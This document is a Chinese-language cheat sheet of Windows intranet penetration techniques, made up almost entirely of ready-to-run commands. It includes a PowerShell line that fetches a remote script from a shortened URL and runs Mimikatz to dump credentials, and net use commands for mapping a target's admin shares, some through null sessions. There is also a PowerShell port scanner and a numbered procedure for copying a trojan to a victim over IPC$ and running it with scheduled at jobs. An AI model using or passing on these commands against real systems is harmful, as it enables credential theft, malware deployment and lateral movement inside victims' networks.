内网渗透技巧

通过powershell 运行mimikatz

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"  

获取hash之后，解出明文密码
将目标机器共享盘映射到本地的h盘

net use h: \\ip\c$ "密码" /user:"用户名"

注意，映射盘对方也可以看到，动静比较大
还有一些用法

net use \\ip\ipc$ " " /user:" " 建立IPC空链接 
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: 
net use h: \\ip\c$ 登陆后映射对方C：到本地为H: 
net use \\ip\ipc$ /del 删除IPC链接 
net use h: /del 删除映射对方到本地的为H:的映射

利用powershell扫描内网

针对某IP段 & 多个端口的扫描器

powershell "1..20 | % { $a = $_; write-host "------"; write-host "10.0.0.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$null}"

内网收集信息

查看软件安装版本，两种方式

wmic product > version.txt

powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"

使用ipc$入侵

1、net use \\ip\ipc$ 密码 /user:用户名  建立ipc$连接（可能会有空连接，密码为空）
2、copy 文件名 \\ip\c$                 将木马复制到目标机共享盘中（这里还可以将共享盘映射到本地，直接拖拽文件上去，net use z: \\目标IP\c$ "密码" /user:"用户名"，net use z: /del /y  删除映射的z盘）
3、net time \\ip                       查看目标机的当前时间
4、at \\ip 时间 命令(注意加盘符)                    设置在目标当前时间，往后一点，执行木马程序
5、入侵成功，连接你的肉鸡
6、net use \\ip\ipc$ /del              删除一个连接

at命令详解

at 查看自己计算机上的计划作业 
at \\ip 查看远程计算机上的计划作业 
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业 
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业 
at \\ip all /delete 删除远程计算机上的全部计划作业 
at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt；